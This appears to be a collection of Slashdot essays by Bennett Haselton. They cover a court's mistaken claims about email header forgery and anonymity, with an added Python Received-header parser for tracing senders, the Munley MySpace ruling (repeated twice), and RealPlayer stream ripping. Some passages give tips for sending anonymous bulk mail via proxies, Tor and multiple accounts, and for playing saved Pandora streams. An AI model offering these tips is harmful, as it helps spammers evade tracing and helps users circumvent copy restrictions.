These are statements that are only true if you play some kind of parlor game to find a way to read them as "true," not statements that indicate the court knew what was going on. To review: IP addresses in the U.S. are generally allocated by ARIN in blocks to Internet service providers and Web hosting companies; these companies then lease the IP addresses to their customers. You can look up an IP address with ARIN to determine which ISP or hosting company has been assigned that particular block, but the ISP or hosting company generally won't tell you the identity of their customer who has leased it from them. And anybody can register a domain, but most domain registrars give you the option of registering the domain anonymously, so that only the registrar knows the owner's true identity. So the court's statement that a database search "can eventually lead" to contact information is correct only if you clarify that it "can" lead there, but it usually won't. As a finding of fact, this is 100% true, and about as useful as "Obama might win in November. Or he might not."
But it's impossible to defend what the court says next:
As shown by the record, because e-mail transmission protocol requires entry of an IP address and domain name for the sender, the only way such a speaker can publish an anonymous e-mail is to enter a false IP address or domain name. Therefore ... registered IP addresses and domain names discoverable through searchable data bases and registration documents "necessarily result[] in a surrender of [the speaker's] anonymity."
Now, there are two possible definitions of "anonymity" to consider: (1) you can be anonymous to the extent that ordinary citizens reading your content cannot determine your identity without a subpoena; or (2) you can be anonymous to the extent that even the government, armed with subpoenas and wiretaps, can never find out who you are. But under either interpretation of the word, the court's statement that "the only way such a speaker can publish an anonymous e-mail is to enter a false IP address or domain name," is wrong.
By default, almost all Internet users are already anonymous in the first sense, even without using forged headers or other tricks in their e-mails. When you send e-mail through your own Internet service provider's mail server, or when you log on to Hotmail and send messages from a Hotmail account, or when you lease a dedicated server from a Web hosting company and use it to send mails, the messages don't contain any more information about your true identity than you decide to put in them. Only the government could ordinarily discover your identity in those cases, by looking at the IP address that the message was sent from, and subpoenaing the Internet service provider or hosting company for the identity of the person using that IP address at that time.
But there are even ways to be anonymous in the second sense -- such that not even the government could identify you -- without resorting to forged e-mail headers. You can create Hotmail and Gmail accounts without giving the providers any of your true information. When you send messages through those services, they pass along the IP address that you used to connect to their Web sites, but you can obscure your IP address as well, by using an anonymizing proxy or a service like Tor.
Elsewhere in their decision, the court indicated that what they really wanted to protect was the right to send anonymous bulk e-mails that were political or otherwise non-commercial. But even by that standard, it's still possible to use Hotmail and Gmail together with an anonymizing proxy (the mail services do impose limits on how many messages each account can send in a day, but if you want to send bulk mails badly enough, you can always sign up for multiple accounts). And if you only care about staying beyond the reach of U.S. subpoena power, you can always sign up for a dedicated host overseas and send the bulk mails from there.
Apart from the court's misstatement that forged headers are the only way to publish anonymously in e-mail, there is the incorrect presumption that forged headers actually do afford anonymity in either of the senses given above. The court wrote, "[T]he only way such a speaker can publish an anonymous e-mail is to enter a false IP address or domain name." But while it is possible to enter any domain you want in your return e-mail address when you send an e-mail, the court apparently didn't know what it was talking about when it referred to "entering a false IP address." You can't just "enter" any arbitrary IP address when sending an e-mail. If user@domain name.com receives an e-mail, the mail server at domain name.com has to receive the message over a connection made from some other machine, and the domain name.com mail server can always see the IP address of the machine on the other end of the connection. Normally, this machine on the other end would be the mail server of the sender's Internet service provider. Or if the sender has leased a dedicated machine at a hosting company, that dedicated machine would be the one connecting to the domain name.com mail server. Some desktop spamming programs let you turn your home computer into the sending mail server, so that it connects directly with the remote mail server to send the message. In all of these cases, the receiving mail server can see the IP address of the sending machine, so a government subpoena would usually be enough to determine the sender's identity. (I know you all know this, but I have delusions that some helpful clerk will print out this article and explain this to the judge.)
When spammers "enter" false IP addresses in sending mails, that usually means entering made-up IP addresses in headers that are sent along with the contents of the message. However, these would normally only have the effect of throwing someone off the trail who opened the message sent to user@domain name.com and was reading the headers manually. Perhaps they would see some random IP addresses scattered in the headers, would go to ARIN and look up the hosting company or ISP that those IP addresses were assigned to, and would mistakenly file a complaint with that company. But the domain name.com server can always see the true IP address that the message was received from, and for people who know how to read the headers properly, that IP address will be indicated in the headers as the address that connected to the domain name.com mail server to send the mail.
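The header-reading rule described above can be shown in code. This is an added example, not part of the original article: every hostname, IP address and header line in it is constructed, and the sets of the recipient's own mail hosts and relay IPs are assumptions the reader would replace with their own. It walks the Received headers from the top (most recently added) and stops at the first one stamped by the recipient's own server for a connection from an outside address; everything below that line was supplied by the sender and cannot be verified.

```python
import re
from email import message_from_string

# Constructed sample message. The two lowest Received headers are forged by
# the sender; one of them even claims to have been written by the recipient's MX.
SAMPLE = """\
Received: from mx1.recipient.example (mx1.recipient.example [10.0.0.5])
    by store.recipient.example with ESMTP id 0002; Mon, 1 Sep 2008 10:00:05 -0400
Received: from mail.bulk-sender.example (unknown [203.0.113.45])
    by mx1.recipient.example with ESMTP id 0001; Mon, 1 Sep 2008 10:00:02 -0400
Received: from relay.innocent-isp.example (relay.innocent-isp.example [198.51.100.7])
    by mx1.recipient.example with SMTP; Mon, 1 Sep 2008 09:59:40 -0400
Received: from [192.0.2.200] by relay.innocent-isp.example; Mon, 1 Sep 2008 09:59:10 -0400
From: "Someone" <someone@innocent-isp.example>
To: user@recipient.example
Subject: constructed sample

body
"""

# Assumptions: the hosts and internal relay IPs the recipient actually operates.
TRUSTED_HOSTS = {"store.recipient.example", "mx1.recipient.example"}
TRUSTED_IPS = {"10.0.0.5"}

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
BY_RE = re.compile(r"\bby\s+([A-Za-z0-9.-]+)")


def parse_received(value):
    """Extract the stamping host ('by') and the peer IP from one Received header."""
    flat = " ".join(value.split())  # undo header folding
    from_clause = re.split(r"\s+by\s+", flat, maxsplit=1)[0]
    ip = IP_RE.search(from_clause)
    by = BY_RE.search(flat)
    return {
        "by": by.group(1).lower() if by else None,
        "peer_ip": ip.group(1) if ip else None,
    }


def find_connecting_ip(raw, trusted_hosts=TRUSTED_HOSTS, trusted_ips=TRUSTED_IPS):
    """Return (connecting_ip, unverified_ips).

    connecting_ip is the address our own server saw on the other end of the
    SMTP connection, or None if no header can be attributed to our servers.
    unverified_ips are addresses from headers below the trust boundary.
    """
    msg = message_from_string(raw)
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    for i, hop in enumerate(hops):
        if hop["by"] not in trusted_hosts:
            # Chain of our own stamps is broken before reaching an outside peer.
            return None, [h["peer_ip"] for h in hops[i:] if h["peer_ip"]]
        if hop["peer_ip"] not in trusted_ips:
            # Our server accepted this from an outside machine: the boundary.
            # Headers below it arrived as message data, even if they name our host.
            return hop["peer_ip"], [h["peer_ip"] for h in hops[i + 1:] if h["peer_ip"]]
    return None, []


if __name__ == "__main__":
    ip, unverified = find_connecting_ip(SAMPLE)
    print("connecting IP recorded by our server:", ip)
    print("sender-supplied, unverifiable:", unverified)
```

The address to look up with ARIN, or to name in a subpoena, is the first value returned; the addresses in the second list are the ones that would lead a manual reader to complain to the wrong company.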
So the court's statement that "the only way such a speaker can publish an anonymous e-mail is to enter a false IP address or domain name" is doubly wrong: because it's easy to send e-mails anonymously without using forged headers, and because forged headers do not in fact provide the level of anonymity that the court said should be protected anyway. The only way to truly obscure your identity by hijacking a third-party IP address without permission, would be to hack into a third party's computer, by infecting a user's home computer with a Trojan horse for example, and using it to send mail. Presumably the court was not contemplating that such an activity should be considered legal, even as a means of sending political speech.
It would presumably be unconstitutional for an anti-spam law to prohibit anonymous political e-mails which attempted to hide the sender's identity -- that is after all what "anonymous" means! You couldn't pass a law outlawing Tor, for example. But the Virginia law doesn't apply to senders merely trying to hide their identity, it applies only to the use of computers "to falsify or forge electronic mail transmission information or other routing information in any manner in connection with the transmission of unsolicited bulk electronic mail" (emphasis added). There is a difference between obscuring one's identity (which Tor and anonymous remailers allow you to do), and actively trying to frame an existing third party by using forged headers to make the mail appear that it came from somewhere else, especially when sending bulk mail, which is likely to generate complaints whether it's commercial or not.
By contrast, the Washington anti-spam law prohibits any mail which "misrepresents or obscures" the origin of the message (emphasis added). This is broader and could be construed to include a wider range of things, such as the use of overseas IP addresses to send bulk mail on behalf of a U.S. company, or the use of anonymously registered domains to hide the sender's identity. It would probably be unconstitutional to prohibit these obscuring techniques for non-commercial anonymous e-mail, which is why the Washington law specifically applies only to commercial messages.
But here I'm getting into issues like constitutional law where different experts might disagree. The clear-cut technical fact is that, contrary to the court's ruling, forged e-mail headers do not provide true anonymity when sending mail, whereas there are other, legal, ways of sending mail that do make the sender truly anonymous.
What is frustrating about the court's misstatements about IP addresses, domain names, and anonymity, is that the judge is obviously intelligent and could have understood the concepts if they had been explained correctly to him. I held some misconceptions for a long time myself about domain names and IP addresses, because the first explanations I read were incomplete or wrong, or I didn't understand them. But the mistakes in the ruling would have been caught if the judge had just showed a draft to an Internet guru and said, "Hey, can you check if there's anything wrong here?" I know, I know, that's "just not done" (and there are probably formal rules in most states against showing a draft of a ruling to a third party before publishing it, even if the third party reviewer is sworn to secrecy, as they should be). But there's nothing stopping the judge from asking a technical expert during the trial, "It seems to me that the only way to publish anonymously on the Internet would be to use forged headers in e-mail. Can you tell me if that's right before I go too far down that line of reasoning?"
I've appeared before judges in Small Claims court who did ask questions about any part of the technical issues that they wanted to understand, and were even willing to revise some prior misconceptions. But all of them, even the open-minded ones, proceed by gathering information during the trial, and then in the conclusion, spell out their argument and their ruling (during which time you're not allowed to interrupt), which is then set in stone unless you appeal. I've never seen a judge say, "Here's the line of reasoning in my head right now, and my tentative conclusion. Is there anything in that chain of reasoning that you want to dispute, before I make it final? I am not promising to change my mind just because you disagree with something. But I will take it into account." This is essentially what scientists do when they submit their papers for peer review before publishing them, to minimize the chance of making an error. Judges could do the same thing -- if not formally, because they're not allowed to show opinions to third parties, then at least informally, by running their ideas past the experts assembled in their courtroom -- to reduce the chance of making a mistake. But have you ever heard of a judge doing that?
The Virginia judges probably did about as well as one could be expected to do, having learned all these technical terms only recently, and then withdrawing to their chambers to form an argument without any feedback from any technical experts. So, given the technical howlers that ended up in the ruling, the moral is that forming an argument in isolation from experts is probably not the right way to go about it.
-
Judge Munley is So Out of My Top 8
Frequent Slashdot Contributor Bennett Haselton writes "A federal judge has ruled that a school district didn't violate a student's free speech rights when it suspended her for a parody MySpace page she created calling her principal a sex addict who "hits on students". In the ruling, Judge James M. Munley made the curious argument that if the case involves a student publishing lewd and offensive speech outside of school on their own time, then the proper precedent-setting cases to look to, are cases involving students making offensive statements in school during school hours, not cases involving students making less-offensive statements outside of school on their own time. In other words, if you can't find prior caselaw where all of the factors are the same, then the lewd-speech issue is more significant than the issue of whether the speech was made in or out of school." Hit that magical link below to read the rest of these words.
Apart from the politics of minors' free speech rights in general, I think there are at least three logical problems with the ruling. The first is the judge's argument that even though on-campus speech and off-campus speech are separate, if the off-campus speech is offensive enough, that elevates it to the point of giving the school jurisdiction over it. The second is the judge's comparison between a student's parody MySpace page, and the mock-threatening rap lyrics that got a student expelled in another court case -- a court ruled that the school overstepped their bounds by expelling the student for the rap song, but Judge Munley said that a MySpace page jokingly calling the principal a "sex addict" was actually more offensive than the violent rap lyrics. The third is the argument that because the student's conduct was so offensive that it could have theoretically been criminally punished if the principal took her to court, that made it acceptable for the school to take the easier route of suspending her.
All right, all together now: I'm not a lawyer, and probably neither are you. But as I've said before, if you put 10 judges in 10 separate rooms and asked them to decide this case (or any other case) independently of each other, you'd be very unlikely to get a consensus anyway. The importance of courts in a civilized society is that they provide a peaceful means of settling disputes, not because we expect that the judges will actually get the "right" answer -- that's why we don't have a crisis of faith in the system every time the Supreme Court splits 5-4. (By contrast, when physicists work on problems involving car safety and satellite trajectories, we do care about them getting the "right" answer, and so physicists are held to a higher standard than judges -- we expect that 9 physicists working on the same problem in separate rooms would all get the same result.) That goes for the rest of us too -- I have no independent confirmation that I'm right, and anyone ranting with supreme confidence that I'm wrong, has no independent confirmation that they're right, either. The best we can do is try to make arguments that are logically consistent, and check that even if they are free of internal contradictions, that they also can't be carried through to an absurd conclusion.
To wit: Judge Munley's decision cites four prior cases that involved students making offensive or disruptive speech (although still not as offensive as the MySpace page in this case calling the principal a pedophile) while on school property or at school events: Bethel School Dist v. Fraser, Hazelwood Sch. Dist. v. Kuhlmeier, Morse v. Frederick, and Klein v. Smith. In those cases, the courts ruled that the discipline did not violate the students' rights because the students were at school events or on campus when they made the statements at issue. Judge Munley then cites another list of cases in which students published speech that was generally more offensive than the incidents in the first list, but did it on their own time, away from school: Flaherty v. Keystone Oaks Sch. Dist., Latour v. Riverside Beaver Sch. Dist., Killion v. Franklin Regional Sch. Dist., and Layshock v. Hermitage Sch. Dist. In all of these cases, the courts ruled that the school districts violated the students' rights by punishing them for off-campus speech. So far, all eight of these cases cited by Munley, followed the rule: on-campus or school-affiliated speech is punishable, off-campus speech is not. (Munley cites only one case that was an exception to this rule: Fenton v. Stear, in which the court upheld the punishment of a student who was off campus when he loudly referred to a teacher as a "prick.")
But then, Judge Munley argues more or less that the speech in this case is so offensive (calling the principal a sex addict and a pedophile), that you're allowed to lift it out of the category of off-campus speech and treat it by analogy to earlier cases involving on-campus speech. Munley wrote:
In the instant case, there can be no doubt that the speech used is vulgar and lewd. The profile contains words such as "fucking," "bitch," "fagass," "dick," "tight ass," and "dick head." The speech does not make any type of political statement. It is merely an attack on the school's principal. It makes him out to be a pedophile and sex addict. This speech is not the Tinker silent political protest. It is more akin to the lewd and vulgar speech addressed in Fraser. It is also akin to the speech that promoted illegal actions in the Morse case.
The content itself is "akin" to the offensive speech in the earlier cases, but what difference does that make, if the speech didn't take place in school? Getting back to first principles: Why does the First Amendment generally grant the freedom to call people "dick" and "tight ass"? Because it doesn't hurt anyone except to the extent that it hurts their feelings, and you don't have a right to unhurt feelings. Because the remarks can be made in the context of general legitimate criticism of someone, which might motivate them to change the behavior that led someone to call them a "tight ass" in the first place. Once these premises are accepted, it doesn't matter if you ratchet up the offensiveness from calling someone a "dick" to calling them a "fucking dick." It does change the analysis if you move the speech to a different setting, e.g. standing up in class when people are trying to learn, and shouting that the principal is a "fucking dick." But that's not what this student was doing.
After all, if the regulation of off-campus speech were justified in order to prevent harm or embarrassment to the principal, carry that through to its logical conclusion: Suppose a former student, who had since graduated, created the parody MySpace page and e-mailed it to friends at the school. The school's "interest" in preserving order and protecting the principal's reputation, would be exactly the same -- and yet no court has ever suggested that the government can punish a former student for speech outside of school (unless the speech rises to the level of threats or libel, which anyone can be punished for, regardless of the former student-principal relationship). To be punished, the former student would have to bring the speech into the school, where it could cause a disruption (and where, as a non-student, they could be banned from the premises anyway).
As for the second problem, apart from the issue of whether offensiveness alone is enough to give the school the right to punish a student for off-campus speech, there is the question of what criteria Judge Munley used to determine that the MySpace page was more offensive than the student off-campus speech in previous cases. In Latour v. Riverside Beaver Sch. Dist., the court found that a student's rap lyrics which made mock threats toward another student, identified by name, could not be treated as a true threat because they were the kind of boastful posturing that rappers are known for (apparently including the ones in junior high school these days). Similarly, the MySpace page created in this case, began with the words:
yes. It's your oh so wonderful, hairy,
expressionless, sex addict, fagass, put on this world
with a small dick PRINCIPAL
and hopefully the principal would agree that any reasonable reader would know this was not written by him. So if the content of the speech in both cases was clearly not meant to be taken seriously, a fair apples-to-apples comparison would be to ask which is the more offensive topic: violence, or a joke about a principal listing among his "interests": "detention, being a tight ass, riding the fraintrain, spending time with my child (who looks like a gorilla), baseball, my golden pen, fucking in my office, hitting on students and their parents"?
What Judge Munley seems to be saying is that joking about murder is more acceptable than joking about a principal hitting on students. While I think this is absurd and offensive to victims of violence, I have to admit that this is at least consistent with standards of censorship in the U.S. It's a tired old complaint, but it's never been satisfactorily answered: Why can you show a character being killed on television, but a sex act is taboo? Why are the most offensive swear words derived from sex acts and sex organs, but there are no equivalent words for murder that are banned from the airwaves? What's worse?
Third, the judge seemed to adopt the position that because the student could theoretically have been prosecuted for creating the fake MySpace profile, that made it acceptable for the school to impose a milder punishment that circumvented the court system. Judge Munley wrote:
The speech at issue here could have been the basis for criminal charges against J.S. Additionally, the state police indicated to McGonigle that he could press harassment charges based upon the imposter profile. (Dep. McG, 98-99). McGonigle indicated that he would not press charges, but asked the police officer to contact the students involved and their parents to inform them of the seriousness of the situation. (Dep. McG at 99, 163-64). The officer summoned the students and their parents to the state police station and discussed the seriousness of the profile and that McGonigle would not press charges.
It's at least debatable whether the MySpace page, which was an obvious parody, could have been the basis for criminal charges. But suppose we grant the judge that point. In that case, even if we know that someone's actions would have gotten them a more severe punishment from the courts, is it acceptable to give them a lighter punishment for something else, just because that's simpler for the school?
No. First, because it fosters disrespect for the rule of law in general: If you committed X, then you should be punished for X, according to the rules set up for punishing X. When Judge Jackie Glass began O.J. Simpson's trial this month for robbing two men at gunpoint, she told jurors: "If you think you are going to punish Mr Simpson for what happened in 1995, this is not the case for you." She, like most sentient beings, probably believed privately that O.J. committed the murders in 1994, but she knew the rule of law was more important than the outcome of any one case, even a murder trial. Second, lighter punishments (such as a suspension from school) often come with a lower standard of judicial review, so you could end up getting an undeserved punishment, in cases where a proper trial for the actual crime at issue might have found that you should not have been punished at all. (Al Capone did get put away for tax evasion, but the court found that he was in fact guilty of tax evasion -- they weren't reaching that as a compromise to avoid trying him for his crimes as a gangster.)
To come clean, however, I have to admit that I have tried to egg judges down that route occasionally. I've taken spammers to court and gotten them to say, under oath, that they never sent any spam and didn't know what I was talking about, before I revealed a tape-recording of a conversation (recorded legally) in which they offered to send 5 million pieces of spam for $500, that the spams were routed out through a server in China to help defeat spam filters, etc. The idea was that the judge would get pissed at the spammer for committing perjury, but realize that it would be too much paperwork to prosecute that, so just bang them over the head with a thousand-dollar judgment for spamming, which would go to me. Unfortunately this can backfire if the judge is so opposed to anti-spam suits that no amount of evidence will convince them anyway. But even if it had worked, it would not be strictly correct to say that justice had been done -- perjury should be punished as perjury, even if only with a slap on the wrist.
So, I'm sure that Judge Munley was trying in his own way to do the right thing by preserving order in the school system, but he probably decided in advance what conclusion to reach, and came up with the arguments after the fact. Still, it may not be a loss for student rights in the long run. The ACLU, which represented the student, has not said whether they will appeal, and anyway, virtually all other caselaw so far has said that student speech off campus is protected, as Judge Munley himself pointed out.
-
Judge Munley is So Out of My Top 8
Frequent Slashdot Contributor Bennett Haselton writes "A federal judge has ruled that a school district didn't violate a student's free speech rights when it suspended her for a parody MySpace page she created calling her principal a sex addict who "hits on students". In the ruling, Judge James M. Munley made the curious argument that if the case involves a student publishing lewd and offensive speech outside of school on their own time, then the proper precedent-setting cases to look to, are cases involving students making offensive statements in school during school hours, not cases involving students making less-offensive statements outside of school on their own time. In other words, if you can't find prior caselaw where all of the factors are the same, then the lewd-speech issue is more significant than the issue of whether the speech was made in or out of school." Hit that magical link below to read the rest of these words.Apart from the politics of minors' free speech rights in general, I think there are at least three logical problems with the ruling. The first is the judge's argument that even though on-campus speech and off-campus speech are separate, if the off-campus speech is offensive enough, that elevates it to the point of giving the school jurisdiction over it. The second is the judge's comparison between a student's parody MySpace page, and the mock-threatening rap lyrics that got a student expelled in another court case -- a court ruled that the school overstepped their bounds by expelling the student for the rap song, but Judge Munley said that a MySpace page jokingly calling the principal a "sex addict" was actually more offensive than the violent rap lyrics. The third is the argument that because the student's conduct was so offensive that it could have theoretically been criminally punished if the principal took her to court, that made it acceptable for the school to take the easier route of suspending her.
All right, all together now: I'm not a lawyer, and probably neither are you. But as I've said before, if you put 10 judges in 10 separate rooms and asked them to decide this case (or any other case) independently of each other, you'd be very unlikely to get a consensus anyway. The importance of courts in a civilized society is that they provide a peaceful means of settling disputes, not because we expect that the judges will actually get the "right" answer -- that's why we don't have a crisis of faith in the system every time the Supreme Court splits 5-4. (By contrast, when physicists work on problems involving car safety and satellite trajectories, we do care about them getting the "right" answer, and so physicists are held to a higher standard than judges -- we expect that 9 physicists working on the same problem in separate rooms would all get the same result.) That goes for the rest of us too -- I have no independent confirmation that I'm right, and anyone ranting with supreme confidence that I'm wrong, has no independent confirmation that they're right, either. The best we can do is try to make arguments that are logically consistent, and check that even if they are free of internal contradicions, that they also can't be carried through to an absurd conclusion.
To wit: Judge Munley's decision cites four prior cases that involved students making offensive or disruptive speech (although still not as offensive as the MySpace page in this case calling the principal a pedophile) while on school property or at school events: Bethel School Dist v. Fraser, Hazlewood Sch. Dist. v. Kuhlmeier, Morse v. Frederick, and Klein v. Smith. In those cases, the courts ruled that the discipline did not violate the students' rights because the students were at school events or on campus when they made the statements at issue. Judge Munley then cites another list of cases in which students published speech that was generally more offensive than the incidents in the first list, but did it on their own time, away from school: Flaherty v. Keystone Oaks Sch. Dist., Latour v. Riverside Beaver Sch. Dist., Killion v. Franklin Regaional Sch. Dist., and Layshock v. Hermitage Sch. Dist. In all of these cases, the courts ruled that the school districts violated the students' rights by punishing them for off-campus speech. So far, all eight of these cases cited by Munley, followed the rule: on-campus or school-affiliated speech is punishable, off-campus speech is not. (Munley cites only one case that was an exception to this rule: Fenton v. Stear, in which the court upheld the punishment of a student who was off campus when he loudly referred to a teacher as a "prick.")
But then, Judge Munley argues more or less that the speech in this case is so offensive (calling the principal a sex addict and a pedophile), that you're allowed to lift it out of the category of off-campus speech and treat it by analogy to earlier cases involving on-campus speech. Munley wrote:
In the instant case, there can be no doubt that the speech used is vulgar and lewd. The profile contains words such as "fucking," "bitch," "fagass," "dick," "tight ass," and "dick head." The speech does not make any type of political statement. It is merely an attack on the school's principal. It makes him out to be a pedophile and sex addict. This speech is not the Tinker silent political protest. It is more akin to the lewd and vulgar speech addressed in Fraser. It is also akin to the speech that promoted illegal actions in the Morse case.
The content itself is "akin" to the offensive speech in the earlier cases, but what difference does that make, if the speech didn't take place in school? Getting back to first principles: Why does the First Amendment generally grant the freedom to call people "dick" and "tight ass"? Because it doesn't hurt anyone except to the extent that it hurts their feelings, and you don't have a right to unhurt feelings. Because the remarks can be made in the context of general legitimate criticism of someone, which might motivate them to change the behavior that led someone to call them a "tight ass" in the first place. Once these premises are accepted, it doesn't matter if you ratchet up the offensiveness from calling someone a "dick" to calling them a "fucking dick." It does change the analysis if you move the speech to a different setting, e.g. standing up in class when people are trying to learn, and shouting that the principal is a "fucking dick." But that's not what this student was doing.
After all, if the regulation of off-campus speech were justified in order to prevent harm or embarrassment to the principal, carry that through to its logical conclusion: Suppose a former student, who had since graduated, created the parody MySpace page and e-mailed it to friends at the school. The school's "interest" in preserving order and protecting the principal's reputation, would be exactly the same -- and yet no court has ever suggested that the government can punish a former student for speech outside of school (unless the speech rises to the level of threats or libel, which anyone can be punished for, regardless of the former student-principal relationship). To be punished, the former student would have to bring the speech into the school, where it could cause a disruption (and where, as a non-student, they could be banned from the premises anyway).
As for the second problem, apart from the issue of whether offensiveness alone is enough to give the school the right to punish a student for off-campus speech, there is the question of what criteria Judge Munley used to determine that the MySpace page was more offensive than the student off-campus speech in previous cases. In Latour v. Riverside Beaver Sch. Dist. , the court found that a student's rap lyrics which made mock threats toward another student, identified by name, could not be treated as a true threat because they were the kind of boastful posturing that rappers are known for (apparently including the ones in junior high school these days). Similarly, the MySpace page created in this case, began with the words:
yes. It's your oh so wonderful, hairy,
expressionless, sex addict, fagass, put on this world
with a small dick PRINCIPALand hopefully the principal would agree that any reasonable reader would know this was not written by him. So if the content of the speech in both cases was clearly not meant to be taken seriously, a fair apples-to-apples comparison would be to ask which is the more offensive topic: violence, or a joke about a principal listing among his "interests": "detention, being a tight ass, riding the fraintrain, spending time with my child (who looks like a gorilla), baseball, my golden pen, fucking in my office, hitting on students and their parents"?
What Judge Munley seems to be saying is that joking about murder is more acceptable than joking about a principal hitting on students. While I think this is absurd and offensive to victims of violence, I have to admit that this is at least consistent with standards of censorship in the U.S. It's a tired old complaint, but it's never been satisfactorily answered: Why can you show a character being killed on television, but a sex act is taboo? Why are the most offensive swear words derived from sex acts and sex organs, but there are no equivalent words for murder that are banned from the airwaves? What's worse?
Third, the judge seemed to adopt the position that because the student could theoretically have been prosecuted for creating the fake MySpace profile, that made it acceptable for the school to impose a milder punishment that circumvented the court system. Judge Munley wrote:
The speech at issue here could have been the basis for criminal charges against J.S. Additionally, the state police indicated to McGonigle that he could press harassment charges based upon the imposter profile. (Dep. McG, 98-99). McGonigle indicated that he would not press charges, but asked the police officer to contact the students involved and their parents to inform them of the seriousness of the situation. (Dep. McG at 99, 163-64). The officer summoned the students and their parents to the state police station and discussed the seriousness of the profile and that McGonigle would not press charges.
It's at least debatable whether the MySpace page, which was an obvious parody, could have been the basis for criminal charges. But suppose we grant the judge that point. In that case, even if we know that someone's actions would have gotten them a more severe punishment from the courts, is it acceptable to give them a lighter punishment for something else, just because that's simpler for the school?
No. First, because it fosters disrespect for the rule of law in general: If you committed X, then you should be punished for X, according to the rules set up for punishing X. When Judge Jackie Glass began O.J. Simpson's trial this month for robbing two men at gunpoint, she told jurors: "If you think you are going to punish Mr Simpson for what happened in 1995, this is not the case for you." She, like most sentient beings, probably believed privately that O.J. committed the murders in 1994, but she knew the rule of law was more important than the outcome of any one case, even a murder trial. Second, lighter punishments (such as a suspension from school) often come with a lower standard of judicial review, so you could end up getting an undeserved punishment, in cases where a proper trial for the actual crime at issue might have found that you should not have been punished at all. (Al Capone did get put away for tax evasion, but the court found that he was in fact guilty of tax evasion -- they weren't reaching that as a compromise to avoid trying him for his crimes as a gangster.)
To come clean, however, I have to admit that I have tried to egg judges down that route occasionally. I've taken spammers to court and gotten them to say, under oath, that they never sent any spam and didn't know what I was talking about, before I revealed a tape-recording of a conversation (recorded legally) in which they offered to send 5 million pieces of spam for $500, that the spams were routed out through a server in China to help defeat spam filters, etc. The idea was that the judge would get pissed at the spammer for committing perjury, but realize that it would be too much paperwork to prosecute that, so just bang them over the head with a thousand-dollar judgment for spamming, which would go to me. Unfortunately this can backfire if the judge is so opposed to anti-spam suits that no amount of evidence will convince them anyway. But even if it had worked, it would not be strictly correct to say that justice had been done -- perjury should be punished as perjury, even if only with a slap on the wrist.
So, I'm sure that Judge Munley was trying in his own way to do the right thing by preserving order in the school system, but he probably decided in advance what conclusion to reach, and came up with the arguments after the fact. Still, it may not be a loss for student rights in the long run. The ACLU, which represented the student, has not said whether they will appeal, and anyway, virtually all other caselaw so far has said that student speech off campus is protected, as Judge Munley himself pointed out.
-
Corporate Behemoth Keeps Ripping "Real"
Slashdot contributor Bennett Haselton has written in with a tale of media rippers and corporate giants: "In 2001 RealNetworks sued and blocked Streambox from distributing the Ripper, a program that let users rip and save RealAudio and RealVideo streams even if the stream contained a proprietary "do not copy" flag. Then one year ago this month, RealNetworks caused a stir by releasing a beta of RealPlayer 11 that similarly let the user record and save streams from sites like YouTube and Pandora. YouTube rippers and the like had existed before, but this was the first time a major company had included a stream ripper in its media player. And while RealPlayer 11 didn't explicitly ignore any copy protection flags, the release still provoked legal rumblings: in a Variety article by Scott Kirsner, an anonymous network exec accused RealNetworks of 'aiding and abetting piracy' and said that they would 'more likely than not' take action against RealNetworks. But now that the feature has stayed in RealPlayer for a year, its real impact will be not on piracy but on the perceived legitimacy of ripping programs. The corporate behemoth, raked over the coals in the past for privacy violations and nuisance-ware, strikes a blow for free-culture hackers." The rest of Bennett's essay is available by following that magical link right below these words.
First, the reasons I don't think that RealPlayer has much effect on actual piracy. Yes, if a pirate has uploaded your favorite song to YouTube, you can save a copy of the video file to hear the song over and over, but you can do the same thing on YouTube itself as long as you're connected to the Internet. The anonymous network exec in the Variety article points out that RealPlayer "allows you to own [content] forever on your hard drive, even if the Web site that distributed that content illegally has taken it down in because we've complained."
But regardless of what complaints they've been sending, almost all popular songs are currently available for listening on YouTube so that anyone with a Net connection can get them on demand, and that's a separate issue, with or without RealPlayer.
So then it becomes a question of whether RealPlayer enables the user to do more interesting things with the song or video, like take it with them on an iPod. RealPlayer only lets you save YouTube videos as an FLV file. But as long as doing things like playing an FLV file on an iPod requires an outside hack, that option is only available to people who are resourceful enough to go out and find tools like that (admittedly not a very high bar, but too hard for many people). So, suppose you define a "resourceful" person as someone smart enough to figure out how to convert an FLV file into an iPod-viewable format. Then there are two possibilities: (a) either a person is not that "resourceful", in which case if they want content to take with them, they'll still have to get it through legitimate channels like the iTunes store, or (b) if the person is "resourceful", they would have known about tools for ripping YouTube videos to MP3, long before RealPlayer 11 came out (in fact, most sites that come up in a search for "flv to mp3 converter" are just rippers specifically for YouTube). In either case, RealPlayer's ability to save FLV files has no impact on the market for the song.
I haven't talked about some outlier cases where RealPlayer could perhaps help a novice user avoid paying for content (if a novice pirate didn't know enough to download a movie from a BitTorrent network, they could perhaps save up enough interesting videos from YouTube for a long plane ride where they won't have Internet access). But there's an easy way to get a verdict on RealPlayer's impact on piracy: How much have you heard teenagers talking about it? You heard teens through the years buzzing about Napster, KaZaA, and BitTorrent, but... RealPlayer? The cliche among teenagers today is to go "find something on YouTube", but "and then grab it with RealPlayer" has yet to prove useful enough to enter the vernacular.
Similarly, RealPlayer can be used to rip streams from Pandora, but it's just hard enough to do it that most people are likely to give up. Before going into details, I should say that I'm against anyone trying to circumvent paying for music. Most of the time when you read that on the Web, it carries this nudge-wink subtext right before the author launches into a detailed description about how, exactly, to circumvent paying for music. But I really do believe that there is a vast untapped potential of unwritten good music out there, and that it could be tapped if there were only lower barriers of entry for musicians, better channels to distribute music to users, and a guarantee that users would pay instead of stealing it -- all of which is helped by services like Pandora. On the other hand, I also believe that if a copying scheme can be circumvented, and especially if it can be circumvented in a way that's fairly easy to discover, there's no point in keeping it secret: We might as well push things forward by acknowledging that the scheme is beatable, and deciding what to do about it.
The outing commences: if you save a stream from Pandora, RealPlayer will give you an error if you try to play the stream back from your RealPlayer library. But if you find the "mp4" file in your RealPlayer downloads, you can play it in WinAmp. However, the file as saved will not play in Windows Media Player, iTunes, or RealPlayer itself. Plus, since Pandora does not let you pick which song you want to listen to on demand, your stream might contain all the songs that you had to skip past to get the one you wanted, and you'd have to find a utility to edit the mp4 file to get rid of that cruft at the beginning. At some point, the effort probably exceeds the dollar you'd have to pay to get the song on iTunes (or, if you're a pirate, the effort to find it on a p2p network).
Again, the "teenager buzz test" is instructive. You do hear kids these days talking about listening to songs on Pandora, but not about ripping them with RealPlayer.
